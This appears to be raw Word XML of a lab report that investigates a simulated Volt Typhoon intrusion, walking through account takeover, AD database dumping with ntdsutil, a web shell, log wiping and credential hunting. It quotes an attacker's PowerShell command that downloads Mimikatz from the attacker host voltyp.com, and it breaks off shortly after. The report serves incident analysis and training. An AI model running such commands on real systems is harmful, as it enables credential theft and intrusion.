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b/>
          <w:bCs/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="volt-typhoon-lab-report"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Volt Typhoon Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Preapaed by : Vineeth M</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Date : Apr 28 , 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="overview"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="overview_Copy_1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>This report documents the investigation of a simulated intrusion attributed to the Volt Typhoon Advanced Persistent Threat (APT)  group. The attack demonstrates a full kill chain—from initial access to command-and-control (C2) and cleanup—leveraging legitimate tools (LOLBins) to evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="initial-access"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The intrusion began with abuse of Zoho ManageEngine ADSelfService Plus, where Dean’s password was changed and the account was taken over at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2024-03-24T11:10:22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Shortly after that compromise, the attacker created a new administrator account named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>voltyp-admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iC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181927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943600" cy="1819275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="execution"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker used WMIC to enumerate local drive information across </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>server01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>server02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with the command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
        <w:t>wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker also used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ntdsutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to copy the AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(active directory)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> database, then compressed the database with the archive password </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="22"/>
            <w:shd w:fill="FFFFA6" w:val="clear"/>
          </w:rPr>
          <w:t>d5ag0nm@5t3r</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor behindDoc="0" distT="635" distB="635" distL="635" distR="635" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1803400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1489075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3732530" cy="99695"/>
                <wp:effectExtent l="635" t="635" r="635" b="635"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Bézier curve 1"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3732480" cy="99720"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="textAreaLeft" fmla="*/ 0 w 2116080"/>
                            <a:gd name="textAreaRight" fmla="*/ 2116440 w 2116080"/>
                            <a:gd name="textAreaTop" fmla="*/ 0 h 56520"/>
                            <a:gd name="textAreaBottom" fmla="*/ 56880 h 56520"/>
                          </a:gdLst>
                          <a:ahLst/>
                          <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
                          <a:pathLst>
                            <a:path fill="none" w="10368" h="277">
                              <a:moveTo>
                                <a:pt x="10368" y="92"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="9901" y="92"/>
                                <a:pt x="9440" y="-6"/>
                                <a:pt x="8973" y="5"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="8574" y="15"/>
                                <a:pt x="8177" y="53"/>
                                <a:pt x="7780" y="122"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="7419" y="184"/>
                                <a:pt x="7041" y="125"/>
                                <a:pt x="6676" y="122"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="6355" y="118"/>
                                <a:pt x="6036" y="114"/>
                                <a:pt x="5717" y="92"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="5311" y="63"/>
                                <a:pt x="4900" y="77"/>
                                <a:pt x="4496" y="92"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="3963" y="111"/>
                                <a:pt x="3431" y="187"/>
                                <a:pt x="2896" y="180"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2549" y="175"/>
                                <a:pt x="2196" y="186"/>
                                <a:pt x="1850" y="180"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1480" y="174"/>
                                <a:pt x="1087" y="261"/>
                                <a:pt x="744" y="92"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="609" y="25"/>
                                <a:pt x="-589" y="-75"/>
                                <a:pt x="367" y="92"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="684" y="147"/>
                                <a:pt x="1002" y="222"/>
                                <a:pt x="1326" y="208"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1803" y="187"/>
                                <a:pt x="2267" y="316"/>
                                <a:pt x="2752" y="266"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="3134" y="227"/>
                                <a:pt x="3531" y="307"/>
                                <a:pt x="3914" y="238"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="4320" y="165"/>
                                <a:pt x="4727" y="185"/>
                                <a:pt x="5135" y="180"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="5472" y="176"/>
                                <a:pt x="5814" y="152"/>
                                <a:pt x="6152" y="180"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="6528" y="211"/>
                                <a:pt x="6909" y="226"/>
                                <a:pt x="7287" y="208"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="7673" y="190"/>
                                <a:pt x="8061" y="184"/>
                                <a:pt x="8449" y="180"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="8833" y="176"/>
                                <a:pt x="9225" y="180"/>
                                <a:pt x="9613" y="180"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="10049" y="180"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="10165" y="150"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:noFill/>
                        <a:ln w="0">
                          <a:solidFill>
                            <a:srgbClr val="ff4000"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0"/>
                        <a:fillRef idx="0"/>
                        <a:effectRef idx="0"/>
                        <a:fontRef idx="minor"/>
                      </wps:style>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict/>
          </mc:Fallback>
        </mc:AlternateContent>
        <w:br/>
      </w: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59461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943600" cy="2594610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Logs of  enumerate local drive information across </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>server01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>server02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="persistence"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">To maintain access, the attacker created a web shell from base64-encoded content and placed it in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>C:\Windows\Temp\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>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384429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943600" cy="3844290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> web shell from base64-decoded content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="defense-evasion"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker began covering tracks by wiping RDP evidence and used the PowerShell cmdlet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Remove-Item-Property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to remove the “Most Recently Used” record. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>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295846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943600" cy="2958465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">They then renamed the archive to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cl64.gif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and checked the registry path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for signs of virtualization.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>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233553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943600" cy="2335530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reg query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, the attacker investigated credential-related software entries for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>putty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>realvnc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>They also downloaded and ran Mimikatz using the decoded command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="credential-access"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
        <w:t>Invoke-WebRequest -Uri "http://voltyp.com/3/tlz/mimikatz.exe" -OutFile "C:\Temp\db2\mimikatz.exe";</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
